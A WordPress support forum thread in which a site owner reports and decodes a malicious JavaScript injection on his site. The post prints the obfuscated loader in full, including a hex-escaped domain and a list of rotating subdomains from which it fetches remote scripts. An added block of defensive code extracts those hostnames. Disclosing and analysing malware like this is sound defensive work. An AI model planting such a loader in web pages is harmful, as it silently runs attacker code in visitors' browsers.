Title: Javascript Injection Report – based in etufg.com
Last modified: August 19, 2016

---

# Javascript Injection Report – based in etufg.com

 *  [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/)
 * I have just discovered an incident of Javascript Injection on my WordPress-based
   website. I am running the latest version of WP, and all associated plugins.
 * The raw code is inserted just after the opening `body` tag.
 * The raw code is:
 * `[hack code moderated]`
 * This can be decoded to:
 * `<ads><script type="text/javascript">document.write( <script>var a=document.cookie;
   document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=""
   +document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){
   e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(
   d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","
   kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*
   g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("
   hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/
   javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.
   js"><\/script>')};</script> );</script></ads>`
 * The URL at the end, which seems to be the co-ordinating centre for the attack
   is in Hex, and translates to:
 * **etufg.com**
 * So, this code seems to be randomly picking one of the following subdomains within
   that domain:
    - keg.etufg.com
    - kei.etufg.com
    - ken.etufg.com
    - kep.etufg.com
    - kev.etufg.com
    - kex.etufg.com
    - key.etufg.com
    - khi.etufg.com
    - kid.etufg.com
    - kif.etufg.com
 * I would not be surprised if further subdomains and/or domains are involved, but
   this is just the result of my first 40 minutes of investigations.
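
Added example (not part of the original post, and not code from the thread's participants): a static way to recover the hostnames from a snippet like the one decoded above, treating the `\xHH` escapes and the array literal as text instead of running the script. `SAMPLE` is a constructed, shortened excerpt of that snippet, and the function names are hypothetical.

```javascript
// Static indicator extraction: the suspicious script is only read as text,
// never passed to eval() or loaded in a browser.

// Constructed, shortened excerpt modelled on the decoded snippet in the post.
const SAMPLE =
  String.raw`var g=["keg","kei","ken"],h=Math.floor(Math.random()*g.length);` +
  String.raw`document.write('<script type="text/javascript" src="http://'+g[h]+` +
  String.raw`'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')`;

// Replace \xHH escapes with the characters they stand for.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Look for  http://' + NAME[INDEX] + '.suffix  and expand NAME from its
// array literal, giving every hostname the random pick could produce.
function extractHosts(src) {
  const text = decodeHexEscapes(src);
  const hosts = new Set();
  const concat = /https?:\/\/['"]\s*\+\s*(\w+)\[\w+\]\s*\+\s*['"]\.([a-z0-9.-]+)/gi;
  for (const [, arrayName, suffix] of text.matchAll(concat)) {
    const arr = new RegExp(`\\b${arrayName}\\s*=\\s*\\[([^\\]]*)\\]`).exec(text);
    if (!arr) continue; // array not defined in this fragment
    for (const lit of arr[1].matchAll(/["']([a-z0-9-]+)["']/gi)) {
      hosts.add(`${lit[1]}.${suffix}`.toLowerCase());
    }
  }
  return [...hosts];
}

// True if a file's text names the domain either in plain form or hidden
// behind \xHH escapes, which a plain-text search for the domain would miss.
function mentionsDomain(fileText, domain) {
  return decodeHexEscapes(fileText).toLowerCase().includes(domain.toLowerCase());
}

console.log(extractHosts(SAMPLE));
console.log(mentionsDomain(SAMPLE, "etufg.com"));
```

The resulting hostnames can be searched for in proxy or DNS logs, and `mentionsDomain` can be run over theme and plugin files to find copies where the domain only appears in escaped form.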

Viewing 6 replies - 1 through 6 (of 6 total)

 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642721)
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642747)
 * Thanks Samuel, I was more posting it here as it seems to be code which either
   has not been seen before, or has not been written up like this before (I Googled
   for segments of the code above, but found no matches).
 * Just trying to save someone else a bit of time, effort, and hair should more 
   people be affected.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642748)
 * post it at pastebin.com and bring the link back here
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642761)
 * [Pastebin of Hack Code](http://pastebin.com/rqQMaGGF)
 * Not that I can see the point of putting the code on Pastebin, where it might 
   be found through Googling, but with no links back to this Forum post – creating
   a dead-end for anyone investigating their problem. But, as you are the Mod, I
   will defer to your judgement.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642778)
 * the problem putting it here is everyone’s virus alert will start going off and
   I really don’t want to deal with all the “omg, the forum’s hacked” threads and
   emails
    :>)
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642813)
 * But the code had been rendered into HTML and would not execute – so it should
   not have set off any kind of alerts.
 * Any content I share here as a Post is parsed to make it readable – ie “`<`” changes
   to “`& lt;`” (space added to prevent parser from doing the same here), etc. which
   means that, from the view of the browser, it is content rather than structure
   and will be displayed, but not executed.
 * I don’t understand your point.


The topic ‘Javascript Injection Report – based in etufg.com’ is closed to new replies.

## Tags

 * [attack](https://wordpress.org/support/topic-tag/attack/)
 * [javascript](https://wordpress.org/support/topic-tag/javascript/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 6 replies
 * 2 participants
 * Last reply from: [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * Last activity: [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642813)
 * Status: not a support question

